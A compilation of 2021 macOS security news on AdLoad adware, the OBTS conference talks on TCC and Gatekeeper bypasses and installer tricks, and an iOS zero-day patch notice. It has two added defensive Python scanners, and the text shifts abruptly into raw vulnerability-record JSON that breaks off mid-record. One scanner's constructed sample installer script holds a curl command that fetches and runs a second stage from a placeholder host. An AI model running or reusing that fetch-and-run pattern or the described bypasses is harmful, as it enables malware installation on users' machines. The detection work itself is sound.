A new wave of attacks involving a notorious macOS adware family has grown to around 150 unique samples in the wild in 2021 alone. Some of those samples have slipped past Apple's on-device malware scanner, and some were even notarized by Apple, highlighting the malware's ongoing efforts to adapt and evade detection.
"AdLoad," as the malware is known, is one of several widespread adware and bundleware loaders targeting macOS since at least 2017. It's capable of backdooring an affected system to download and install adware or potentially unwanted programs (PUPs), as well as amass and transmit information about victim machines.
The new iteration "continues to impact Mac users who rely solely on Apple's built-in security control XProtect for malware detection," SentinelOne threat researcher Phil Stokes [said](<https://labs.sentinelone.com/massive-new-adload-campaign-goes-entirely-undetected-by-apples-xprotect/>) in an analysis published last week. "As of today, however, XProtect arguably has around 11 different signatures for AdLoad [but] the variant used in this new campaign is undetected by any of those rules."
The 2021 iteration of AdLoad names its persistence agent and its executable with a file-extension pattern (.system or .service) that differs from earlier samples, which lets it slip past the additional protections Apple has added since. The result is the installation of a persistence agent, which in turn triggers an attack chain that deploys malicious droppers masquerading as a fake Player.app to install the malware.
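The naming pattern just described is something a responder can hunt for directly in launchd job files. The following is an added example, not SentinelOne's or Apple's code: it parses every `.plist` in a LaunchAgents-style directory with Python's standard `plistlib` and flags jobs whose plist name or executable name ends in `.system` or `.service`. The sample jobs it writes to a temporary directory are constructed for the demonstration (the `/Users/victim/...` paths and `com.example-*` labels are invented); on a real machine, point `scan_launch_agents()` at `~/Library/LaunchAgents`, `/Library/LaunchAgents` or `/Library/LaunchDaemons`.

```python
"""Hunt for launchd jobs whose plist or executable name carries the .system / .service
suffix pattern tied to the 2021 AdLoad variant. Added example; sample jobs are constructed."""
import os
import plistlib
import tempfile

# Suffixes the SentinelOne report ties to this variant's persistence and executables.
SUSPICIOUS_SUFFIXES = (".system", ".service")

# Constructed sample jobs (labels and paths are invented; "victim" is a placeholder user).
SAMPLE_AGENTS = {
    "com.example.benign.plist": {
        "Label": "com.example.benign",
        "Program": "/Applications/Example.app/Contents/MacOS/Example",
        "RunAtLoad": True,
    },
    "com.example-adware.system.plist": {
        "Label": "com.example-adware.system",
        "ProgramArguments": [
            "/Users/victim/Library/Application Support/com.example-adware/com.example-adware.system",
            "-s",
        ],
        "RunAtLoad": True,
    },
    "com.example-loader.plist": {
        "Label": "com.example-loader",
        "Program": "/Users/victim/Library/Application Support/com.example-loader/com.example-loader.service",
        "RunAtLoad": True,
        "KeepAlive": True,
    },
    "com.example.systemhelper.plist": {   # ".system" inside the name is not the suffix pattern
        "Label": "com.example.systemhelper",
        "Program": "/usr/local/bin/systemhelper",
    },
}


def program_path(plist):
    """The executable a launchd job runs: Program wins, otherwise ProgramArguments[0]."""
    prog = plist.get("Program")
    if prog:
        return prog
    args = plist.get("ProgramArguments")
    if isinstance(args, list) and args:
        return args[0]
    return None


def suspicious_reasons(plist_name, program):
    """Why a job looks like AdLoad-style persistence: the plist stem or the executable
    name ends with one of the suspicious suffixes."""
    reasons = []
    stem = plist_name[:-len(".plist")] if plist_name.endswith(".plist") else plist_name
    if stem.endswith(SUSPICIOUS_SUFFIXES):
        reasons.append("plist name ends with %s" % os.path.splitext(stem)[1])
    if program and os.path.basename(program).endswith(SUSPICIOUS_SUFFIXES):
        reasons.append("executable name ends with %s" % os.path.splitext(program)[1])
    return reasons


def scan_launch_agents(directory):
    """Parse every .plist in `directory` (XML or binary) and return the jobs worth a closer look."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(directory, name)
        try:
            with open(path, "rb") as fh:
                plist = plistlib.load(fh)
        except Exception:
            continue  # not a parsable plist; skip rather than abort the sweep
        program = program_path(plist)
        reasons = suspicious_reasons(name, program)
        if reasons:
            findings.append({
                "file": path,
                "label": plist.get("Label"),
                "program": program,
                "run_at_load": bool(plist.get("RunAtLoad", False)),
                "reasons": reasons,
            })
    return findings


def write_sample_agents(directory):
    """Write the constructed jobs plus one unparsable file, to show the scanner skips it."""
    for name, job in SAMPLE_AGENTS.items():
        with open(os.path.join(directory, name), "wb") as fh:
            plistlib.dump(job, fh)
    with open(os.path.join(directory, "broken.plist"), "wb") as fh:
        fh.write(b"not a plist")


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_agents(tmp)
        return scan_launch_agents(tmp)


if __name__ == "__main__":
    for hit in demo():
        print(hit["label"], hit["program"], "|", "; ".join(hit["reasons"]))
```

A hit is a lead, not a verdict: follow it with `codesign -dv --verbose=4` on the program path to see which developer identity signed it, and treat a revoked or freshly issued certificate on a `.system`/`.service` binary as the pattern the article describes.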
What's more, the droppers are [signed](<https://blog.confiant.com/osx-hydromac-a-new-macos-malware-leaked-from-a-flashcards-app-2af28f1caa9e>) with valid Apple developer certificates. Apple has been revoking those certificates "within a matter of days (sometimes hours) of samples being observed on VirusTotal, offering some belated and temporary protection against further infections by those particular signed samples by means of Gatekeeper and OCSP signature checks," Stokes noted.
SentinelOne said it then saw new samples signed with fresh certificates within hours or days, calling it a "game of whack-a-mole." The first samples of this AdLoad variant appeared as early as November 2020, with regular further occurrences across the first half of 2021, followed by a sharp uptick throughout July and, in particular, the early weeks of August 2021.
AdLoad is among the malware families, alongside Shlayer, that have been known to bypass XProtect and infect Macs with other malicious payloads. In April 2021, Apple addressed an actively exploited zero-day Gatekeeper bypass ([CVE-2021-30657](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>)) that the Shlayer operators abused to deploy unapproved software on compromised systems.
"Malware on macOS is a problem that the device manufacturer is struggling to cope with," Stokes said. "The fact that hundreds of unique samples of a well-known adware variant have been circulating for at least 10 months and yet still remain undetected by Apple's built-in malware scanner demonstrates the necessity of adding further endpoint security controls to Mac devices."
Source: The Hacker News, "New AdLoad Variant Bypasses Apple's Security Defenses to Target macOS Systems", published 2021-08-16, <https://thehackernews.com/2021/08/new-adload-variant-bypasses-apples.html>. Referenced CVE: CVE-2021-30657 (CVSS 3.1 base score 5.5, Medium, vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N; CVSS 2.0 base score 4.3; EPSS 0.8497, percentile 0.979, as of 2023-03-17).
## Inside Apple: How macOS attacks are evolving

(Malwarebytes Labs, published 2021-10-12; related coverage of CVE-2021-30657)

The start of fall 2021 saw the fourth [Objective by the Sea (OBTS)](<https://objectivebythesea.com>) security conference, which is the only security conference to focus exclusively on Apple's ecosystem. As such, it draws many of the top minds in the field. This year, those minds, having been starved of a good security conference for so long, were primed and ready to share all kinds of good information.

Conferences like this are important for understanding how attackers and their methods are evolving. Like all operating systems, macOS presents a moving target to attackers as it acquires new features and new forms of protection over time.

OBTS was a great opportunity to see how attacks against macOS are evolving. Here's what I learned.

### Transparency, Consent, and Control bypasses

Transparency, Consent, and Control (TCC) is a system for requiring user consent to access certain data, via prompts confirming that the user is okay with an app accessing that data. For example, if an app wants to access something like your contacts or files in your Documents folder on a modern version of macOS, you will be asked to allow it before the app can see that data.

[Figure: a TCC prompt asking the user to allow access to the Downloads folder]

In recent years, Apple has been ratcheting down the power of the root user. Once upon a time, root was like God: it was the one and only user that could do everything on the system. It could create or destroy, and could see all. This hasn't been the case for years, with things like System Integrity Protection (SIP) and the read-only signed system volume preventing even the root user from changing files across a wide swath of the hard drive.

TCC has been making inroads in further reducing the power of root over users' data. If an app has root access, it still cannot even _see_, much less modify, a lot of the data in your user folder without your explicit consent.

This can cause some problems. For example, antivirus software such as Malwarebytes needs to be able to see everything it can in order to best protect you. But even though some Malwarebytes processes are running with root permissions, they still can't see some files. Thus, apps like this often have to require the user to give a special permission called Full Disk Access (FDA). Without FDA, Malwarebytes and other security apps can't fully protect you, but only you can give that access.

This is generally a good thing, as it puts you in control of access to your data. Malware often wants access to your sensitive data, either to steal it or to encrypt it and demand a ransom. TCC means that malware can't automatically gain access to your data if it gets onto your system, and may be a part of the reason why we just don't see ransomware on macOS.

TCC is a bit of a pain for us, and a common point of difficulty for users of our software, but it does mean that we can't get access to some of your most sensitive files without your knowledge. This is assuming, of course, that you understood the FDA prompts and what you were agreeing to, which is debatable. Apple's current process for assigning FDA doesn't make that clear, and leaves it up to the app asking for FDA to explain the consequences. This makes tricking a user into giving access to something they shouldn't pretty easy.

However, social engineering isn't the only danger. Many researchers presenting at this year's conference talked about bugs that allowed them to get around the Transparency, Consent, and Control (TCC) system in macOS, _without getting user consent_.

Andy Grant ([@andywgrant](<https://twitter.com/andywgrant>)) presented a vulnerability in which a remote attacker with root permissions can grant a malicious process whatever TCC permissions are desired. The process involves creating a new user on the system, then using that user to grant the permissions.

Csaba Fitzl ([@theevilbit](<https://twitter.com/theevilbit>)) gave a talk on a "Mount(ain) of Bugs," in which he discussed another vulnerability involving mount points for disk image files. Normally, when you connect an external drive or double-click a disk image file, the volume is "mounted" (in other words, made available for access) within the `/Volumes` directory. For example, if you connect a drive named "backup", it would become accessible on the system at `/Volumes/backup`. This is the disk's "mount point."

[Figure: title slide of Csaba Fitzl's "Mount(ain) of Bugs" talk]

Csaba was able to create a disk image file containing a custom TCC.db file. This file is a database that controls the TCC permissions that the user has granted to apps. Normally, the TCC.db file is readable, but cannot be modified by anything other than the system. However, by mounting this disk image while also setting the mount point to the path of the folder containing the TCC.db file, he was able to trick the system into accepting his arbitrary TCC.db file as if it were the real one, allowing him to change TCC permissions however he desired.

There were other TCC bypasses mentioned as well, but perhaps the most disturbing is the fact that there's a fairly significant amount of highly sensitive data that is not protected by TCC at all. Any malware can collect that data without difficulty.

What is this data, you ask? One example is the `.ssh` folder in the user's home folder. SSH is a program used for securely gaining command line access to a remote Mac, Linux, or other Unix system, and the `.ssh` folder is where the private keys (and any certificates) used to authenticate the connection are stored. This makes the data in that folder a high-value target for an attacker looking to move laterally within an organization.

There are other similar folders in the same location that can contain credentials for other services, such as AWS or Azure, which are similarly wide open. Also unprotected are the folders where data is stored for any browser other than Safari, which can include credentials if you use a browser's built-in password manager.

Now, admittedly, there could be some technical challenges to protecting some or all of this data under the umbrella of TCC. However, the average IT admin is probably more concerned about SSH keys or other credentials being harvested than about an attacker being able to peek inside your Downloads folder.

### Attackers are doing interesting things with installers

Installers are, of course, important for malware to get installed on a system. Often, users must be tricked into opening something in order to infect their machine. A variety of techniques attackers can use were discussed.

One common method for doing this is to use Apple installer packages (.pkg files), but this is not particularly stealthy. Knowledgeable and cautious folks may choose to examine the installer package, as well as the `preinstall` and `postinstall` scripts (designed to run exactly when you'd expect from the names), to make sure nothing untoward is going on.

However, citing an example used in the recent Silver Sparrow malware, Tony Lambert ([@ForensicITGuy](<https://twitter.com/ForensicITGuy>)) discussed a sneaky method for getting malware installed: the oft-overlooked `Distribution` file.

The `Distribution` file is found inside Apple installer packages, and is meant to convey information and options for the installer. However, JavaScript code can also be inserted in this file, to be run at the beginning of the installation; it is meant to be used to determine whether the system meets the requirements for the software being installed.

In the case of Silver Sparrow, however, the installer used this script to download and install the malware covertly. If you clicked Continue in the dialog shown below, you'd be infected even if you then opted not to continue with the installation.

[Figure: installer dialog; clicking Continue installs the malware]

Another interesting trick Tony discussed was the use of payload-free installers. These are installers that don't actually contain any files to be installed, and are really just a wrapper for a script that does all the installation (likely via the `preinstall` script, but also potentially via `Distribution`).

Normal installer packages leave behind a "receipt," which is a file containing a record of when the installation happened and what was installed where. However, installers that lack an official payload, and that download everything via scripts, do not leave behind such a receipt. This means that an IT admin or security researcher would be missing key information that could reveal when and where malware had been installed.

Chris Ross ([@xorrior](<https://twitter.com/xorrior>)) discussed some of these same techniques, but also delved into installer plugins.
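Before moving on to installer plugins: the `Distribution` and payload-free tricks above are straightforward to check for once a package has been expanded with `pkgutil --expand pkg.pkg outdir`. The following is an added example, not code from the talks or from Malwarebytes. It parses the expanded package's `Distribution` XML for `<script>` blocks and `installation-check`/`volume-check` hooks, looks for `system.run(` calls in the JavaScript, and checks each component package directory for a `Payload` file. The package it builds in a temporary directory is constructed in the style the text describes; the `example.invalid` URL and `com.example.updater` identifier are invented.

```python
"""Triage an expanded macOS installer package (pkgutil --expand output) for
Distribution-script execution and payload-free components.
Added example; the sample package below is constructed, not a real sample."""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# The Installer JavaScript API exposes system.run(); a Distribution script that calls it
# executes a command while the installer evaluates its checks, before any payload lands.
RUN_CALL = re.compile(r"system\.run\s*\(")

# Constructed Distribution file in the style described above (identifiers and URL invented).
SAMPLE_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
    <title>Example Updater</title>
    <options customize="never"/>
    <installation-check script="installation_check()"/>
    <script>
function installation_check() {
    system.run("/bin/sh", "-c",
               "/usr/bin/curl -so /tmp/stage2 http://example.invalid/stage2; /bin/sh /tmp/stage2");
    return true;
}
    </script>
    <choices-outline>
        <line choice="default"/>
    </choices-outline>
    <choice id="default">
        <pkg-ref id="com.example.updater"/>
    </choice>
    <pkg-ref id="com.example.updater" version="1.0" onConclusion="none">#updater.pkg</pkg-ref>
</installer-gui-script>
"""
SAMPLE_POSTINSTALL = "#!/bin/sh\n/bin/sh /tmp/stage2\n"


def inspect_distribution(path):
    """Pull the script hooks, embedded JavaScript and package references out of Distribution."""
    root = ET.parse(path).getroot()
    scripts = [(el.text or "").strip() for el in root.iter("script")]
    hooks = {}
    for tag in ("installation-check", "volume-check"):
        el = root.find(tag)
        if el is not None and el.get("script"):
            hooks[tag] = el.get("script")   # JS functions the installer runs on its own
    return {
        "hooks": hooks,
        "scripts": scripts,
        "runs_commands": any(RUN_CALL.search(s) for s in scripts),
        "pkg_refs": [el.text.strip() for el in root.iter("pkg-ref") if el.text and el.text.strip()],
    }


def inspect_components(expanded_dir):
    """For each component package directory, record whether it ships a Payload and its scripts."""
    comps = []
    for name in sorted(os.listdir(expanded_dir)):
        comp = os.path.join(expanded_dir, name)
        if not (name.endswith(".pkg") and os.path.isdir(comp)):
            continue
        scripts_dir = os.path.join(comp, "Scripts")
        comps.append({
            "name": name,
            "has_payload": os.path.isfile(os.path.join(comp, "Payload")),
            "scripts": sorted(os.listdir(scripts_dir)) if os.path.isdir(scripts_dir) else [],
        })
    return comps


def triage_package(expanded_dir):
    dist = inspect_distribution(os.path.join(expanded_dir, "Distribution"))
    comps = inspect_components(expanded_dir)
    flags = []
    if dist["runs_commands"]:
        flags.append("Distribution JavaScript calls system.run(): code runs as soon as the "
                     "installer evaluates its checks, before any payload is installed")
    if comps and not any(c["has_payload"] for c in comps):
        flags.append("payload-free package: nothing is installed except what scripts produce, "
                     "so no receipt records when or where it ran")
    for c in comps:
        if c["scripts"] and not c["has_payload"]:
            flags.append("%s carries scripts (%s) but no Payload" % (c["name"], ", ".join(c["scripts"])))
    return {"distribution": dist, "components": comps, "flags": flags}


def write_sample_package(expanded_dir):
    """Lay out what pkgutil --expand would produce for the constructed package."""
    with open(os.path.join(expanded_dir, "Distribution"), "w") as fh:
        fh.write(SAMPLE_DISTRIBUTION)
    comp = os.path.join(expanded_dir, "updater.pkg")
    os.makedirs(os.path.join(comp, "Scripts"))
    with open(os.path.join(comp, "PackageInfo"), "w") as fh:
        fh.write('<pkg-info identifier="com.example.updater" version="1.0"/>\n')
    with open(os.path.join(comp, "Scripts", "postinstall"), "w") as fh:
        fh.write(SAMPLE_POSTINSTALL)
    # Deliberately no Payload file: this is the payload-free case.


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_package(tmp)
        return triage_package(tmp)


if __name__ == "__main__":
    for flag in demo()["flags"]:
        print("-", flag)
```

The `hooks` entry matters as much as the script text: a `<script>` block only matters if something invokes it, and `installation-check` and `volume-check` are the two attributes that make the installer call a function on its own, before the user has chosen anything.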
These plugins are used within installer packages to create custom "panes" in the installer. (Most installers go through a specific series of steps prescribed by Apple, but some developers add additional steps via custom code.)

These installer plugins are written in Objective-C, rather than scripting languages, and therefore can be more powerful. Best of all, these plugins are very infrequently used, and thus are likely to be overlooked by many security researchers. Yet Chris was able to demonstrate techniques that could be used by such a plugin to drop a malicious payload on the system.

Yet another issue was presented in Cedric Owens' ([@cedowens](<https://twitter.com/cedowens>)) talk. Although not related to an installer package (.pkg file), a vulnerability in macOS ([CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>)) could allow a Mac app to entirely bypass Gatekeeper, which is the core of many of Apple's security features.

On macOS, any time you open an app downloaded from the Internet, you should at a minimum see a warning telling you that you're opening an app (in case it was something masquerading as a Word document, or something similar). If there's anything wrong with the app, Gatekeeper can go one step further and prevent you from opening it at all.

By constructing an app that was missing some of the specific components usually considered essential, an attacker could create an app that was fully functional, but that would not trigger any warnings when launched. (Some variants of the Shlayer adware have been seen using this technique.)

The post [Inside Apple: How macOS attacks are evolving](<https://blog.malwarebytes.com/malwarebytes-news/2021/10/inside-apple-how-macos-attacks-are-evolving/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

## Update now! Apple patches another privilege escalation bug in iOS and iPadOS

(Malwarebytes Labs, published 2021-10-12; related coverage listing CVE-2021-30657 among Apple's 2021 zero-days)

Apple has released a security update for iOS and iPadOS that addresses a critical vulnerability reportedly being exploited in the wild.

The update has been made available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

### The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one is listed as [CVE-2021-30883](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30883>) and allows an application to execute arbitrary code with kernel privileges. Kernel privileges can be achieved by using a memory corruption issue in the "IOMobileFrameBuffer" component.

Kernel privileges are a serious matter as they offer an attacker more than administrator privileges. In kernel mode, the executing code has complete and unrestricted access to the underlying hardware. It can execute any CPU instruction and reference any memory address.
Kernel mode is generally reserved for the lowest-level, most trusted functions of the operating system.\n\nResearchers have already found that this vulnerability is exploitable from the browser, which makes it extra worrying.\n\n> We can confirm that the recently patched iOS 15.0.2 vulnerability, CVE-2021-30883, is also accessible from the browser: perfect for 1-click & water-holing mobile attacks. This vulnerability is exploited in the wild. Update as soon as possible. <https://t.co/dhogxTM6pT>\n> \n> -- ZecOps (@ZecOps) [October 12, 2021](<https://twitter.com/ZecOps/status/1447804721771606016?ref_src=twsrc%5Etfw>)\n\nWatering holes are used as a highly targeted attack strategy. The attacker infects a website where they knows the intended victim(s) visits regularly. Depending on the nature of the infection, the attacker can single out their intended target(s) or just infect anyone that visits the site unprotected.\n\n### IOMobileFrameBuffer\n\nIOMobileFramebuffer is a kernel extension for managing the screen framebuffer. An earlier vulnerability in this extension, listed as [CVE-2021-30807](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>) was tied to the [Pegasus spyware](<https://blog.malwarebytes.com/privacy-2/2021/07/pegasus-spyware-has-been-here-for-years-we-must-stop-ignoring-it/>). This vulnerability also allowed an application to execute arbitrary code with kernel privileges. Coincidence? Or did someone take the entire IOMobileFramebuffer extension apart and save up the vulnerabilities for a rainy day?\n\nAnother iPhone exploit called [FORCEDENTRY](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/latest-iphone-exploit-forcedenrty-used-to-launch-pegasus-attack-against-bahraini-activists/>) was found to be used against Bahraini activists to launch the Pegasus spyware. 
Researchers at Citizen Lab disclosed this vulnerability and code to Apple, and it was listed as CVE-2021-30860.\n\n### Undisclosed\n\nAs is usual for Apple, both the researcher that found the vulnerability and the circumstances under which the vulnerability used in the wild are kept secret. Apple didn't respond to a query about whether the previously found bug was being exploited by NSO Group's Pegasus surveillance software.\n\n### Zero-days for days\n\nOver the last months Apple has had to close quite a few zero-days in iOS, iPadOS,and macOS. Seventeen if I have counted correctly.\n\n * [CVE-2021-1782](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1782>) - iOS-kernel: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-1870](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1870>) \u2013 WebKit: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-1871](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1871>) \u2013 WebKit: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-1879](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1879>) \u2013 WebKit: Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>) \u2013 Gatekeeper: A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30661>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30663](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30663>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution.\n * [CVE-2021-30665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30665>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30666](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30666>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30713](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30713>) \u2013 TCC: A malicious application may be able to bypass Privacy preferences. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30761](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30761>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30762](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30762>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-308](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>)[0](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>)[7](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>) \u2013 IOMobileFrameBuffer: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. 
Tied to Pegasus (see above).\n * [CVE-2021-30858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30858>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30860>) \u2013 CoreGraphics: Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. This is FORCEDENTRY (see above).\n * [CVE-2021-30869](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30869>) \u2013 XNU: A malicious application may be able to execute arbitrary code with kernel privileges. [Reportedly](<https://www.helpnetsecurity.com/2021/09/24/cve-2021-30869/>) being actively exploited by attackers in conjunction with a previously known WebKit vulnerability.\n\nAnd last but not least, the latest addition\u2014CVE-2021-30883\u2014which means that of the 17 zero-days that were fixed over the course of a handful of months, at least 16 were found to be actively exploited.\n\n### Update\n\nApple advises users to update to [iOS 15.0.2 and iPadOS 15.0.2](<https://support.apple.com/en-gb/HT212846>) which can be done through the automatic update function or iTunes.\n\nStay safe, everyone!\n\nThe post [Update now! 
Apple patches another privilege escalation bug in iOS and iPadOS](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/update-now-apple-patches-another-privilege-escalation-bug-in-ios-and-ipados/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T16:07:53", "type": "malwarebytes", "title": "Update now! Apple patches another privilege escalation bug in iOS and iPadOS", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883"], "modified": "2021-10-12T16:07:53", "id": "MALWAREBYTES:11D4071979D3FC1E6028AA8D71EB87F4", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/update-now-apple-patches-another-privilege-escalation-bug-in-ios-and-ipados/", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-27T14:41:22", "description": "macOS versions prior to 11.3 contain a vulnerability in an unspecified component of System Preferences which, when exploited, results in privilege escalation and the ability to bypass Gatekeeper \u2014 the macOS built-in malware detection and prevention service.\n\n \n**Recent assessments:** \n \n**space-r7** at April 28, 2021 8:19pm UTC reported:\n\nRating this vulnerability as high since it bypasses all of the checks that MacOS performs on downloaded files. It was reportedly introduced in MacOS version `10.15`, and the fix is in version `11.3`. This vulnerability has also been reported as being exploited in the wild.\n\nAn unsigned, unnotarized binary downloaded from the Internet is typically blocked from execution; however a script-based app with no `Info.plist` file bypasses those checks. To read about how that exactly happens, see the objective-see blog post [here](<https://objective-see.com/blog/blog_0x64.html>). This does require user interaction for success, but all it takes is a download and a double click. Additionally, an exploit is quite trivial to make, as all it really needs is a valid app without the `Info.plist` file bundled with it. 
As always, install your updates.\n\nAssessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-09-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-30657 \u2014 Malicious applications may bypass Gatekeeper checks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2021-09-22T00:00:00", "id": "AKB:29A92D92-7F52-42AF-809D-8666D33E0DF2", "href": "https://attackerkb.com/topics/MrqDl2L0CZ/cve-2021-30657-malicious-applications-may-bypass-gatekeeper-checks", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "githubexploit": [{"lastseen": "2023-05-27T15:44:31", "description": "# CVE-2021-30657\nA simple POC for CVE-2021-30657 affecting MacOS...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": 
